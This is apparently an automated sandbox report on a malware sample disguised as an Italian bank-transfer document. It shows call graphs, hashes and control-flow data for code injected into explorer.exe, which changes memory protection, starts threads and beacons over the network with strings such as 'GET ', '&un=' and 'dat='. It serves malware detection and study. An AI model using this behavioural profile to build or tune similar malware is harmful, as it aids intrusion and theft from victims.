                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID: __aulldvrm
                                  • String ID: +$-
                                  • API String ID: 1302938615-2137968064
                                  • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                  • Instruction ID: 5f450c6c40fd46670a887fced3e3fc4d694720ccd108c48e57e4f820ce4c57a1
                                  • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                  • Instruction Fuzzy Hash: F791C570E002169BDF2EDF6DC8806BEBBA5BF44320F14451EE9A5A72C4D7B0AD408B52
                                  Function 010C9126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: $$@
                                  • API String ID: 0-1194432280
                                  • Opcode ID: 7ffbcaf9a608608ce6ede075e168668b08a469500af0d747710b9c1584d060f3
                                  • Instruction ID: fd367e354c0f1ce59b8e389373f3948d16b3c581cf0c5527d2a68e180d89bac1
                                  • Opcode Fuzzy Hash: 7ffbcaf9a608608ce6ede075e168668b08a469500af0d747710b9c1584d060f3
                                  • Instruction Fuzzy Hash: 06811C72D002699BDB35CB54CC45BEEBBB8AB48754F0041EAEA59B7240D7705E85CFA0

                                  Execution Graph

                                  Execution Coverage:2.3%
                                  Dynamic/Decrypted Code Coverage:0%
                                  Signature Coverage:4.7%
                                  Total number of Nodes:444
                                  Total number of Limit Nodes:16
                                  execution_graph 13802 c60bce2 13804 c60bdd9 13802->13804 13803 c60c022 13804->13803 13808 c60b352 13804->13808 13806 c60bf0d 13806->13803 13817 c60b792 13806->13817 13810 c60b39e 13808->13810 13809 c60b58e 13809->13806 13810->13809 13811 c60b4ec 13810->13811 13813 c60b595 13810->13813 13812 c611232 NtCreateFile 13811->13812 13815 c60b4ff 13812->13815 13813->13809 13814 c611232 NtCreateFile 13813->13814 13814->13809 13815->13809 13816 c611232 NtCreateFile 13815->13816 13816->13809 13818 c60b7e0 13817->13818 13819 c611232 NtCreateFile 13818->13819 13821 c60b90c 13819->13821 13820 c60baf3 13820->13806 13821->13820 13822 c60b352 NtCreateFile 13821->13822 13823 c60b602 NtCreateFile 13821->13823 13822->13821 13823->13821 13824 c60e2e4 13825 c60e36f 13824->13825 13826 c60e305 13824->13826 13826->13825 13828 c60e0c2 13826->13828 13829 c60e1f0 13828->13829 13830 c60e0cb 13828->13830 13829->13825 13830->13829 13831 c611f82 6 API calls 13830->13831 13831->13829 13894 c608b66 13895 c608b6a 13894->13895 13896 c608cce 13895->13896 13897 c608cb5 CreateMutexW 13895->13897 13897->13896 13878 c613aa9 13879 c613aaf 13878->13879 13882 c60e212 13879->13882 13881 c613ac7 13883 c60e237 13882->13883 13884 c60e21b 13882->13884 13883->13881 13884->13883 13885 c60e0c2 6 API calls 13884->13885 13885->13883 13766 c60d22a 13767 c60d25e 13766->13767 13768 c60c8c2 ObtainUserAgentString 13767->13768 13769 c60d26b 13768->13769 13601 c612bac 13602 c612bb1 13601->13602 13635 c612bb6 13602->13635 13636 c608b72 13602->13636 13604 c612c2c 13605 c612c85 13604->13605 13607 c612c54 13604->13607 13608 c612c69 13604->13608 13604->13635 13606 c610ab2 NtProtectVirtualMemory 13605->13606 13609 c612c8d 13606->13609 13610 c610ab2 NtProtectVirtualMemory 13607->13610 13611 c612c80 13608->13611 13612 c612c6e 13608->13612 13672 c60a102 13609->13672 13615 c612c5c 13610->13615 13611->13605 13613 c612c97 13611->13613 13616 c610ab2 NtProtectVirtualMemory 13612->13616 13617 c612c9c 13613->13617 13618 c612cbe 13613->13618 13658 c609ee2 13615->13658 13620 c612c76 13616->13620 13640 c610ab2 13617->13640 13622 c612cc7 13618->13622 13623 c612cd9 13618->13623 13618->13635 13664 c609fc2 13620->13664 13624 c610ab2 NtProtectVirtualMemory 13622->13624 13627 c610ab2 NtProtectVirtualMemory 13623->13627 13623->13635 13626 c612ccf 13624->13626 13682 c60a2f2 13626->13682 13630 c612ce5 13627->13630 13700 c60a712 13630->13700 13638 c608b93 13636->13638 13637 c608cce 13637->13604 13638->13637 13639 c608cb5 CreateMutexW 13638->13639 13639->13637 13641 c610adf 13640->13641 13649 c610ebc 13641->13649 13712 c6068f2 13641->13712 13643 c610e5c 13644 c6068f2 NtProtectVirtualMemory 13643->13644 13645 c610e7c 13644->13645 13646 c6068f2 NtProtectVirtualMemory 13645->13646 13647 c610e9c 13646->13647 13648 c6068f2 NtProtectVirtualMemory 13647->13648 13648->13649 13650 c609de2 13649->13650 13651 c609df0 13650->13651 13653 c609ecd 13651->13653 13735 c60d382 13651->13735 13654 c606412 13653->13654 13656 c606440 13654->13656 13655 c606473 13655->13635 13656->13655 13657 c60644d CreateThread 13656->13657 13657->13635 13660 c609f06 13658->13660 13659 c609fa4 13659->13635 13660->13659 13661 c6068f2 NtProtectVirtualMemory 13660->13661 13662 c609f9c 13661->13662 13663 c60d382 ObtainUserAgentString 13662->13663 13663->13659 13666 c60a016 13664->13666 13665 c60a0f0 13665->13635 13666->13665 13669 c6068f2 NtProtectVirtualMemory 13666->13669 13670 c60a0bb 13666->13670 13667 c60a0e8 13668 c60d382 ObtainUserAgentString 13667->13668 13668->13665 13669->13670 13670->13667 13671 c6068f2 NtProtectVirtualMemory 13670->13671 13671->13667 13674 c60a137 13672->13674 13673 c60a2d5 13673->13635 13674->13673 13675 c6068f2 NtProtectVirtualMemory 13674->13675 13676 c60a28a 13675->13676 13677 c6068f2 NtProtectVirtualMemory 13676->13677 13680 c60a2a9 13677->13680 13678 c60a2cd 13679 c60d382 ObtainUserAgentString 13678->13679 13679->13673 13680->13678 13681 c6068f2 NtProtectVirtualMemory 13680->13681 13681->13678 13684 c60a349 13682->13684 13683 c60a4c3 13690 c60a597 13683->13690 13691 c6068f2 NtProtectVirtualMemory 13683->13691 13685 c60a49f 13684->13685 13687 c6068f2 NtProtectVirtualMemory 13684->13687 13685->13683 13686 c6068f2 NtProtectVirtualMemory 13685->13686 13686->13683 13688 c60a480 13687->13688 13689 c6068f2 NtProtectVirtualMemory 13688->13689 13689->13685 13692 c6068f2 NtProtectVirtualMemory 13690->13692 13695 c60a5bf 13690->13695 13691->13690 13692->13695 13693 c60a6e1 13694 c60d382 ObtainUserAgentString 13693->13694 13697 c60a6e9 13694->13697 13696 c60a6b9 13695->13696 13698 c6068f2 NtProtectVirtualMemory 13695->13698 13696->13693 13699 c6068f2 NtProtectVirtualMemory 13696->13699 13697->13635 13698->13696 13699->13693 13701 c60a767 13700->13701 13702 c6068f2 NtProtectVirtualMemory 13701->13702 13707 c60a903 13701->13707 13703 c60a8e3 13702->13703 13704 c6068f2 NtProtectVirtualMemory 13703->13704 13704->13707 13705 c60a9b7 13706 c60d382 ObtainUserAgentString 13705->13706 13709 c60a9bf 13706->13709 13708 c60a992 13707->13708 13710 c6068f2 NtProtectVirtualMemory 13707->13710 13708->13705 13711 c6068f2 NtProtectVirtualMemory 13708->13711 13709->13635 13710->13708 13711->13705 13713 c606987 13712->13713 13716 c6069b2 13713->13716 13727 c607622 13713->13727 13715 c606c0c 13715->13643 13716->13715 13717 c606ba2 13716->13717 13719 c606ac5 13716->13719 13718 c612e12 NtProtectVirtualMemory 13717->13718 13726 c606b5b 13718->13726 13731 c612e12 13719->13731 13721 c612e12 NtProtectVirtualMemory 13721->13715 13722 c606ae3 13722->13715 13723 c606b3d 13722->13723 13725 c612e12 NtProtectVirtualMemory 13722->13725 13724 c612e12 NtProtectVirtualMemory 13723->13724 13724->13726 13725->13723 13726->13715 13726->13721 13728 c60767a 13727->13728 13729 c612e12 NtProtectVirtualMemory 13728->13729 13730 c60767e 13728->13730 13729->13728 13730->13716 13732 c612e45 NtProtectVirtualMemory 13731->13732 13733 c611942 13731->13733 13734 c612e70 13732->13734 13733->13732 13734->13722 13736 c60d3c7 13735->13736 13739 c60d232 13736->13739 13738 c60d438 13738->13653 13740 c60d25e 13739->13740 13743 c60c8c2 13740->13743 13742 c60d26b 13742->13738 13745 c60c934 13743->13745 13744 c60c9a6 13744->13742 13745->13744 13746 c60c995 ObtainUserAgentString 13745->13746 13746->13744 13770 c60742e 13771 c60745b 13770->13771 13779 c6074c9 13770->13779 13772 c611232 NtCreateFile 13771->13772 13771->13779 13773 c607496 13772->13773 13774 c607082 NtCreateFile 13773->13774 13778 c6074c5 13773->13778 13776 c6074b6 13774->13776 13775 c611232 NtCreateFile 13775->13779 13777 c606f52 NtCreateFile 13776->13777 13776->13778 13777->13778 13778->13775 13778->13779 13930 c60e72e 13931 c60e788 connect 13930->13931 13932 c60e76a 13930->13932 13932->13931 13933 c6139f1 13934 c6139f7 13933->13934 13937 c608852 13934->13937 13936 c613a0f 13938 c6088e4 13937->13938 13939 c608865 13937->13939 13938->13936 13939->13938 13941 c608887 13939->13941 13943 c60887e 13939->13943 13940 c60e36f 13940->13936 13941->13938 13942 c60c662 6 API calls 13941->13942 13942->13938 13943->13940 13944 c60e0c2 6 API calls 13943->13944 13944->13940 13832 c6060f1 13833 c606109 13832->13833 13834 c6061d3 13832->13834 13835 c606012 6 API calls 13833->13835 13836 c606113 13835->13836 13836->13834 13837 c611f82 6 API calls 13836->13837 13837->13834 13945 c6075f1 13946 c607606 13945->13946 13947 c60760e 13945->13947 13948 c60c662 6 API calls 13946->13948 13948->13947 13953 c6139b3 13954 c6139bd 13953->13954 13957 c6086d2 13954->13957 13956 c6139e0 13958 c608704 13957->13958 13959 c6086f7 13957->13959 13961 c60872d 13958->13961 13963 c608737 13958->13963 13965 c6086ff 13958->13965 13960 c6060f2 6 API calls 13959->13960 13960->13965 13966 c60e2c2 13961->13966 13964 c611f82 6 API calls 13963->13964 13963->13965 13964->13965 13965->13956 13967 c60e2cb 13966->13967 13968 c60e2df 13966->13968 13967->13968 13969 c60e0c2 6 API calls 13967->13969 13968->13965 13969->13968 13488 c611232 13489 c61125c 13488->13489 13491 c611334 13488->13491 13490 c611410 NtCreateFile 13489->13490 13489->13491 13490->13491 13838 c60a2f4 13840 c60a349 13838->13840 13839 c60a49f 13841 c6068f2 NtProtectVirtualMemory 13839->13841 13845 c60a4c3 13839->13845 13840->13839 13842 c6068f2 NtProtectVirtualMemory 13840->13842 13841->13845 13843 c60a480 13842->13843 13844 c6068f2 NtProtectVirtualMemory 13843->13844 13844->13839 13846 c60a597 13845->13846 13847 c6068f2 NtProtectVirtualMemory 13845->13847 13848 c6068f2 NtProtectVirtualMemory 13846->13848 13849 c60a5bf 13846->13849 13847->13846 13848->13849 13852 c60a6b9 13849->13852 13854 c6068f2 NtProtectVirtualMemory 13849->13854 13850 c60a6e1 13851 c60d382 ObtainUserAgentString 13850->13851 13853 c60a6e9 13851->13853 13852->13850 13855 c6068f2 NtProtectVirtualMemory 13852->13855 13854->13852 13855->13850 13886 c60e0b9 13887 c60e1f0 13886->13887 13888 c60e0ed 13886->13888 13888->13887 13889 c611f82 6 API calls 13888->13889 13889->13887 13780 c61083a 13781 c610841 13780->13781 13782 c611f82 6 API calls 13781->13782 13784 c6108c5 13782->13784 13783 c610906 13784->13783 13785 c611232 NtCreateFile 13784->13785 13785->13783 13856 c60a0fb 13858 c60a137 13856->13858 13857 c60a2d5 13858->13857 13859 c6068f2 NtProtectVirtualMemory 13858->13859 13860 c60a28a 13859->13860 13861 c6068f2 NtProtectVirtualMemory 13860->13861 13864 c60a2a9 13861->13864 13862 c60a2cd 13863 c60d382 ObtainUserAgentString 13862->13863 13863->13857 13864->13862 13865 c6068f2 NtProtectVirtualMemory 13864->13865 13865->13862 13898 c611f7a 13899 c611fb8 13898->13899 13900 c60e5b2 socket 13899->13900 13902 c612081 13899->13902 13909 c612022 13899->13909 13900->13902 13901 c612134 13903 c60e732 connect 13901->13903 13905 c6121b2 13901->13905 13901->13909 13902->13901 13904 c612117 getaddrinfo 13902->13904 13902->13909 13903->13905 13904->13901 13906 c60e6b2 send 13905->13906 13905->13909 13908 c612729 13906->13908 13907 c6127f4 setsockopt recv 13907->13909 13908->13907 13908->13909 13890 c60c8be 13892 c60c8c3 13890->13892 13891 c60c9a6 13892->13891 13893 c60c995 ObtainUserAgentString 13892->13893 13893->13891 13970 c609fbf 13972 c60a016 13970->13972 13971 c60a0f0 13972->13971 13975 c6068f2 NtProtectVirtualMemory 13972->13975 13976 c60a0bb 13972->13976 13973 c60a0e8 13974 c60d382 ObtainUserAgentString 13973->13974 13974->13971 13975->13976 13976->13973 13977 c6068f2 NtProtectVirtualMemory 13976->13977 13977->13973 13498 c611f82 13499 c611fb8 13498->13499 13502 c612081 13499->13502 13508 c612022 13499->13508 13510 c60e5b2 13499->13510 13501 c612134 13505 c6121b2 13501->13505 13501->13508 13513 c60e732 13501->13513 13502->13501 13504 c612117 getaddrinfo 13502->13504 13502->13508 13504->13501 13505->13508 13516 c60e6b2 13505->13516 13507 c612729 13507->13508 13509 c6127f4 setsockopt recv 13507->13509 13509->13508 13511 c60e60a socket 13510->13511 13512 c60e5ec 13510->13512 13511->13502 13512->13511 13514 c60e788 connect 13513->13514 13515 c60e76a 13513->13515 13514->13505 13515->13514 13517 c60e705 send 13516->13517 13518 c60e6e7 13516->13518 13517->13507 13518->13517 13914 c60b14a 13915 c60b153 13914->13915 13920 c60b174 13914->13920 13916 c60d382 ObtainUserAgentString 13915->13916 13918 c60b16c 13916->13918 13917 c60b1e7 13919 c6060f2 6 API calls 13918->13919 13919->13920 13920->13917 13922 c6061f2 13920->13922 13923 c60620f 13922->13923 13927 c6062c9 13922->13927 13924 c610f12 7 API calls 13923->13924 13925 c606242 13923->13925 13924->13925 13926 c606289 13925->13926 13928 c607432 NtCreateFile 13925->13928 13926->13927 13929 c6060f2 6 API calls 13926->13929 13927->13920 13928->13926 13929->13927 13786 c612e0a 13787 c611942 13786->13787 13788 c612e45 NtProtectVirtualMemory 13787->13788 13789 c612e70 13788->13789 13747 c613a4d 13748 c613a53 13747->13748 13751 c607782 13748->13751 13750 c613a6b 13752 c60778f 13751->13752 13753 c6077ad 13752->13753 13755 c60c662 13752->13755 13753->13750 13756 c60c66b 13755->13756 13762 c60c7ba 13755->13762 13757 c6060f2 6 API calls 13756->13757 13756->13762 13759 c60c6ee 13757->13759 13758 c60c750 13761 c60c83f 13758->13761 13758->13762 13763 c60c791 13758->13763 13759->13758 13760 c611f82 6 API calls 13759->13760 13760->13758 13761->13762 13764 c611f82 6 API calls 13761->13764 13762->13753 13763->13762 13765 c611f82 6 API calls 13763->13765 13764->13762 13765->13762 13492 c612e12 13493 c612e45 NtProtectVirtualMemory 13492->13493 13496 c611942 13492->13496 13495 c612e70 13493->13495 13497 c611967 13496->13497 13497->13493 13790 c607613 13792 c607620 13790->13792 13791 c60767e 13792->13791 13793 c612e12 NtProtectVirtualMemory 13792->13793 13793->13792 13866 c60bcd4 13868 c60bcd8 13866->13868 13867 c60c022 13868->13867 13869 c60b352 NtCreateFile 13868->13869 13870 c60bf0d 13869->13870 13870->13867 13871 c60b792 NtCreateFile 13870->13871 13871->13870 13949 c609dd9 13950 c609df0 13949->13950 13951 c60d382 ObtainUserAgentString 13950->13951 13952 c609ecd 13950->13952 13951->13952 13519 c6062dd 13523 c60631a 13519->13523 13520 c6063fa 13521 c606328 SleepEx 13521->13521 13521->13523 13523->13520 13523->13521 13526 c610f12 13523->13526 13535 c607432 13523->13535 13545 c6060f2 13523->13545 13529 c610f48 13526->13529 13527 c611134 13527->13523 13528 c611232 NtCreateFile 13528->13529 13529->13527 13529->13528 13530 c6110e9 13529->13530 13551 c611f82 13529->13551 13532 c611125 13530->13532 13563 c610842 13530->13563 13571 c610922 13532->13571 13536 c60745b 13535->13536 13544 c6074c9 13535->13544 13537 c611232 NtCreateFile 13536->13537 13536->13544 13538 c607496 13537->13538 13543 c6074c5 13538->13543 13583 c607082 13538->13583 13540 c611232 NtCreateFile 13540->13544 13541 c6074b6 13541->13543 13592 c606f52 13541->13592 13543->13540 13543->13544 13544->13523 13546 c606109 13545->13546 13550 c6061d3 13545->13550 13597 c606012 13546->13597 13548 c606113 13549 c611f82 6 API calls 13548->13549 13548->13550 13549->13550 13550->13523 13552 c611fb8 13551->13552 13553 c60e5b2 socket 13552->13553 13555 c612081 13552->13555 13561 c612022 13552->13561 13553->13555 13554 c612134 13556 c60e732 connect 13554->13556 13558 c6121b2 13554->13558 13554->13561 13555->13554 13557 c612117 getaddrinfo 13555->13557 13555->13561 13556->13558 13557->13554 13559 c60e6b2 send 13558->13559 13558->13561 13560 c612729 13559->13560 13560->13561 13562 c6127f4 setsockopt recv 13560->13562 13561->13529 13562->13561 13564 c61086d 13563->13564 13579 c611232 13564->13579 13566 c610906 13566->13530 13567 c610888 13567->13566 13568 c611f82 6 API calls 13567->13568 13569 c6108c5 13567->13569 13568->13569 13569->13566 13570 c611232 NtCreateFile 13569->13570 13570->13566 13572 c6109c2 13571->13572 13573 c611232 NtCreateFile 13572->13573 13575 c6109d6 13573->13575 13574 c610a9f 13574->13527 13575->13574 13576 c610a5d 13575->13576 13578 c611f82 6 API calls 13575->13578 13576->13574 13577 c611232 NtCreateFile 13576->13577 13577->13574 13578->13576 13580 c61125c 13579->13580 13582 c611334 13579->13582 13581 c611410 NtCreateFile 13580->13581 13580->13582 13581->13582 13582->13567 13584 c607420 13583->13584 13585 c6070aa 13583->13585 13584->13541 13585->13584 13586 c611232 NtCreateFile 13585->13586 13588 c6071f9 13586->13588 13587 c6073df 13587->13541 13588->13587 13589 c611232 NtCreateFile 13588->13589 13590 c6073c9 13589->13590 13591 c611232 NtCreateFile 13590->13591 13591->13587 13593 c606f70 13592->13593 13594 c606f84 13592->13594 13593->13543 13595 c611232 NtCreateFile 13594->13595 13596 c607046 13595->13596 13596->13543 13598 c606031 13597->13598 13599 c6060cd 13598->13599 13600 c611f82 6 API calls 13598->13600 13599->13548 13600->13599 13872 c609edd 13873 c609f06 13872->13873 13874 c609fa4 13873->13874 13875 c6068f2 NtProtectVirtualMemory 13873->13875 13876 c609f9c 13875->13876 13877 c60d382 ObtainUserAgentString 13876->13877 13877->13874 13794 c613a1f 13795 c613a25 13794->13795 13798 c6075f2 13795->13798 13797 c613a3d 13799 c6075fb 13798->13799 13800 c60760e 13798->13800 13799->13800 13801 c60c662 6 API calls 13799->13801 13800->13797 13801->13800

                                  Executed Functions

                                  Function 0C611F82 Relevance: 23.6, APIs: 3, Strings: 10, Instructions: 815networkCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 0 c611f82-c611fb6 1 c611fd6-c611fd9 0->1 2 c611fb8-c611fbc 0->2 4 c611fdf-c611fed 1->4 5 c6128fe-c61290c 1->5 2->1 3 c611fbe-c611fc2 2->3 3->1 6 c611fc4-c611fc8 3->6 7 c611ff3-c611ff7 4->7 8 c6128f6-c6128f7 4->8 6->1 9 c611fca-c611fce 6->9 10 c611ff9-c611ffd 7->10 11 c611fff-c612000 7->11 8->5 9->1 12 c611fd0-c611fd4 9->12 10->11 13 c61200a-c612010 10->13 11->13 12->1 12->4 14 c612012-c612020 13->14 15 c61203a-c612060 13->15 14->15 16 c612022-c612026 14->16 17 c612062-c612066 15->17 18 c612068-c61207c call c60e5b2 15->18 16->8 20 c61202c-c612035 16->20 17->18 21 c6120a8-c6120ab 17->21 22 c612081-c6120a2 18->22 20->8 23 c6120b1-c6120b8 21->23 24 c612144-c612150 21->24 22->21 25 c6128ee-c6128ef 22->25 26 c6120e2-c6120f5 23->26 27 c6120ba-c6120dc call c611942 23->27 24->25 28 c612156-c612165 24->28 25->8 26->25 30 c6120fb-c612101 26->30 27->26 31 c612167-c612178 call c60e552 28->31 32 c61217f-c61218f 28->32 30->25 37 c612107-c612109 30->37 31->32 34 c612191-c6121ad call c60e732 32->34 35 c6121e5-c61221b 32->35 43 c6121b2-c6121da 34->43 40 c61222d-c612231 35->40 41 c61221d-c61222b 35->41 37->25 42 c61210f-c612111 37->42 45 c612233-c612245 40->45 46 c612247-c61224b 40->46 44 c61227f-c612280 41->44 42->25 47 c612117-c612132 getaddrinfo 42->47 43->35 49 c6121dc-c6121e1 43->49 48 c612283-c6122e0 call c612d62 call c60f482 call c60ee72 call c613002 44->48 45->44 50 c612261-c612265 46->50 51 c61224d-c61225f 46->51 47->24 52 c612134-c61213c 47->52 63 c6122e2-c6122e6 48->63 64 c6122f4-c612354 call c612d92 48->64 49->35 54 c612267-c61226b 50->54 55 c61226d-c612279 50->55 51->44 52->24 54->48 54->55 55->44 63->64 65 c6122e8-c6122ef call c60f042 63->65 69 c61235a-c612396 call c612d62 call c613262 call c613002 64->69 70 c61248c-c6124b8 call c612d62 call c613262 64->70 65->64 85 c612398-c6123b7 call c613262 call c613002 69->85 86 c6123bb-c6123e9 call c613262 * 2 69->86 79 c6124d9-c612590 call c613262 * 3 call c613002 * 2 call c60f482 70->79 80 c6124ba-c6124d5 70->80 110 c612595-c6125b9 call c613262 79->110 80->79 85->86 100 c612415-c61241d 86->100 101 c6123eb-c612410 call c613002 call c613262 86->101 104 c612442-c612448 100->104 105 c61241f-c612425 100->105 101->100 104->110 111 c61244e-c612456 104->111 108 c612467-c612487 call c613262 105->108 109 c612427-c61243d 105->109 108->110 109->110 121 c6125d1-c6126ad call c613262 * 7 call c613002 call c612d62 call c613002 call c60ee72 call c60f042 110->121 122 c6125bb-c6125cc call c613262 call c613002 110->122 111->110 116 c61245c-c61245d 111->116 116->108 133 c6126af-c6126b3 121->133 122->133 135 c6126b5-c6126fa call c60e382 call c60e7b2 133->135 136 c6126ff-c61272d call c60e6b2 133->136 158 c6128e6-c6128e7 135->158 145 c61275d-c612761 136->145 146 c61272f-c612735 136->146 147 c612767-c61276b 145->147 148 c61290d-c612913 145->148 146->145 151 c612737-c61274c 146->151 155 c612771-c612773 147->155 156 c6128aa-c6128df call c60e7b2 147->156 153 c612779-c612784 148->153 154 c612919-c612920 148->154 151->145 152 c61274e-c612754 151->152 152->145 159 c612756 152->159 160 c612786-c612793 153->160 161 c612795-c612796 153->161 154->160 155->153 155->156 156->158 158->25 159->145 160->161 164 c61279c-c6127a0 160->164 161->164 167 c6127b1-c6127b2 164->167 168 c6127a2-c6127af 164->168 170 c6127b8-c6127c4 167->170 168->167 168->170 173 c6127f4-c612861 setsockopt recv 170->173 174 c6127c6-c6127ef call c612d92 call c612d62 170->174 175 c6128a3-c6128a4 173->175 176 c612863 173->176 174->173 175->156 176->175 179 c612865-c61286a 176->179 179->175 183 c61286c-c612872 179->183 183->175 186 c612874-c6128a1 183->186 186->175 186->176
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.3777784383.000000000C5E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0C5E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_c5e0000_explorer.jbxd
                                  Similarity
                                  • API ID: getaddrinforecvsetsockopt
                                  • String ID: Co$&br=$&sql$&un=$: cl$GET $dat=$nnec$ose$tion
                                  • API String ID: 1564272048-1117930895
                                  • Opcode ID: 5de8858bceb6b52e8c11e308410fa1d1098ae4878da76a5e8b5a3db0c78a0a43
                                  • Instruction ID: 141ddb673397ce4b791bffd37a0f6f3d1215310dd427f96bf5c91893773e2411
                                  • Opcode Fuzzy Hash: 5de8858bceb6b52e8c11e308410fa1d1098ae4878da76a5e8b5a3db0c78a0a43
                                  • Instruction Fuzzy Hash: 21529E30618B488FCB69EF68C4947EAB7E1FB55301F54462EC89FC7252DE30A54ACB85
                                  Function 0C611232 Relevance: 4.1, APIs: 1, Strings: 1, Instructions: 642filenativeCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 303 c611232-c611256 304 c6118bd-c6118cd 303->304 305 c61125c-c611260 303->305 305->304 306 c611266-c6112a0 305->306 307 c6112a2-c6112a6 306->307 308 c6112bf 306->308 307->308 309 c6112a8-c6112ac 307->309 310 c6112c6 308->310 311 c6112b4-c6112b8 309->311 312 c6112ae-c6112b2 309->312 313 c6112cb-c6112cf 310->313 311->313 314 c6112ba-c6112bd 311->314 312->310 315 c6112d1-c6112f7 call c611942 313->315 316 c6112f9-c61130b 313->316 314->313 315->316 320 c611378 315->320 316->320 321 c61130d-c611332 316->321 324 c61137a-c6113a0 320->324 322 c6113a1-c6113a8 321->322 323 c611334-c61133b 321->323 327 c6113d5-c6113dc 322->327 328 c6113aa-c6113d3 call c611942 322->328 325 c611366-c611370 323->325 326 c61133d-c611360 call c611942 323->326 325->320 332 c611372-c611373 325->332 326->325 329 c611410-c611458 NtCreateFile call c611172 327->329 330 c6113de-c61140a call c611942 327->330 328->320 328->327 339 c61145d-c61145f 329->339 330->320 330->329 332->320 339->320 340 c611465-c61146d 339->340 340->320 341 c611473-c611476 340->341 342 c611486-c61148d 341->342 343 c611478-c611481 341->343 344 c6114c2-c6114ec 342->344 345 c61148f-c6114b8 call c611942 342->345 343->324 351 c6114f2-c6114f5 344->351 352 c6118ae-c6118b8 344->352 345->320 350 c6114be-c6114bf 345->350 350->344 353 c611604-c611611 351->353 354 c6114fb-c6114fe 351->354 352->320 353->324 355 c611500-c611507 354->355 356 c61155e-c611561 354->356 359 c611509-c611532 call c611942 355->359 360 c611538-c611559 355->360 361 c611567-c611572 356->361 362 c611616-c611619 356->362 359->320 359->360 366 c6115e9-c6115fa 360->366 367 c6115a3-c6115a6 361->367 368 c611574-c61159d call c611942 361->368 364 c6116b8-c6116bb 362->364 365 c61161f-c611626 362->365 370 c611739-c61173c 364->370 371 c6116bd-c6116c4 364->371 373 c611657-c61166b call c612e92 365->373 374 c611628-c611651 call c611942 365->374 366->353 367->320 369 c6115ac-c6115b6 367->369 368->320 368->367 369->320 376 c6115bc-c6115e6 369->376 380 c611742-c611749 370->380 381 c6117c4-c6117c7 370->381 377 c6116f5-c611734 371->377 378 c6116c6-c6116ef call c611942 371->378 373->320 391 c611671-c6116b3 373->391 374->320 374->373 376->366 401 c611894-c6118a9 377->401 378->352 378->377 387 c61174b-c611774 call c611942 380->387 388 c61177a-c6117bf 380->388 381->320 384 c6117cd-c6117d4 381->384 392 c6117d6-c6117f6 call c611942 384->392 393 c6117fc-c611803 384->393 387->352 387->388 388->401 391->324 392->393 399 c611805-c611825 call c611942 393->399 400 c61182b-c611835 393->400 399->400 400->352 405 c611837-c61183e 400->405 401->324 405->352 406 c611840-c611886 405->406 406->401
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.3777784383.000000000C5E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0C5E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_c5e0000_explorer.jbxd
                                  Similarity
                                  • API ID: CreateFile
                                  • String ID: `
                                  • API String ID: 823142352-2679148245
                                  • Opcode ID: de128a41b66c8ec8222e6cdebfc92e8119e2b93de7d93fbb6a18759800a4d987
                                  • Instruction ID: 6539a9b652887bb13c4194cf26d6198d6615586622114007a5209673d832c77b
                                  • Opcode Fuzzy Hash: de128a41b66c8ec8222e6cdebfc92e8119e2b93de7d93fbb6a18759800a4d987
                                  • Instruction Fuzzy Hash: 6E227B70B18A0D9FCB68DF28C4946AEF7E1FB99302F44422ED95ED3650DB30A451CB81
                                  Function 0C612E12 Relevance: 1.6, APIs: 1, Instructions: 59nativeCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 447 c612e12-c612e38 448 c612e45-c612e6e NtProtectVirtualMemory 447->448 449 c612e40 call c611942 447->449 450 c612e70-c612e7c 448->450 451 c612e7d-c612e8f 448->451 449->448
                                  APIs
                                  • NtProtectVirtualMemory.NTDLL ref: 0C612E67
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.3777784383.000000000C5E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0C5E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_c5e0000_explorer.jbxd
                                  Similarity
                                  • API ID: MemoryProtectVirtual
                                  • String ID:
                                  • API String ID: 2706961497-0
                                  • Opcode ID: 8fde5b3aa229c20c01e10f6c0a0911328a1d50ad6ca7dd15efa95d0be41baddf
                                  • Instruction ID: d5f41df2fceda6befefb52c8a07ffbd1fdba2dcc48befef2322a4834301a7b9e
                                  • Opcode Fuzzy Hash: 8fde5b3aa229c20c01e10f6c0a0911328a1d50ad6ca7dd15efa95d0be41baddf
                                  • Instruction Fuzzy Hash: C801B530628B484F8784EF6CD48012AB7E4FBCE315F000B3EE99AC3250E770C5414742
                                  Function 0C612E0A Relevance: 1.6, APIs: 1, Instructions: 52nativeCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 452 c612e0a-c612e6e call c611942 NtProtectVirtualMemory 455 c612e70-c612e7c 452->455 456 c612e7d-c612e8f 452->456
                                  APIs
                                  • NtProtectVirtualMemory.NTDLL ref: 0C612E67
                                  Memory Dump Source
